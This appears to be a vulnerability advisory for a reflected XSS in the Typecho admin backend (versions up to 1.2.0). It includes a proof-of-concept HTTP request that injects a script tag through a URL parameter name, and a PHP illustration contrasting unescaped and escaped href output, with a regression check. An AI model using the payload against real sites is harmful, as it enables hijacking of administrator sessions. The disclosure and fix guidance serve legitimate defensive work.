Description
The Typecho admin backend management system has a reflected XSS in the name of an arbitrarily supplied URL parameter.
Affected Version
Typecho <= 1.2.0
POC
- Log in to the Typecho admin backend management system and open /admin/index.php, /admin/themes.php or /admin/backup.php.
- The name of an arbitrarily supplied URL parameter, whether key or value, is injected into the HTML href attribute of an <a> tag.
```
GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
Connection: close

```
[Figures: the result in /admin/index.php, /admin/theme.php and /admin/backup.php]
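The injection described in the POC, shown next to the attribute-escaping fix, as an added PHP illustration (not Typecho source code). The function names and the "Refresh" link text are hypothetical; the request target is the one from the POC, taken as the application sees it. It requires PHP's DOM extension.

```php
<?php
// Added illustration; not Typecho source code. All function names are hypothetical.

// Vulnerable pattern: the request URI, including caller-chosen parameter
// names, is concatenated into an href attribute without escaping.
function renderLinkUnsafe(string $requestUri): string
{
    return '<a href="' . $requestUri . '">Refresh</a>';
}

// Hardened pattern: escape for an HTML attribute context. ENT_QUOTES encodes
// both quote styles, so the value can no longer terminate the attribute.
function renderLinkSafe(string $requestUri): string
{
    $escaped = htmlspecialchars($requestUri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $escaped . '">Refresh</a>';
}

// Regression check: parse the markup and report whether a <script>
// element exists in the resulting document tree.
function containsScriptElement(string $html): bool
{
    libxml_use_internal_errors(true); // malformed markup is expected here
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length > 0;
}

// Request target from the POC on this page.
$uri = '/typecho/admin/?"><script>alert(1)</script><!--bbb=1';

$rendered = [
    'unsafe' => renderLinkUnsafe($uri),
    'safe'   => renderLinkSafe($uri),
];

foreach ($rendered as $label => $html) {
    printf(
        "%-6s script element created: %s\n  %s\n",
        $label,
        containsScriptElement($html) ? 'yes' : 'no',
        $html
    );
}
```

The same `containsScriptElement()` check can be pointed at real admin page output in a test suite to confirm that every place reflecting the request URL escapes it.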
Reference
Reported by Srpopty, vulnerability discovered by using Corax.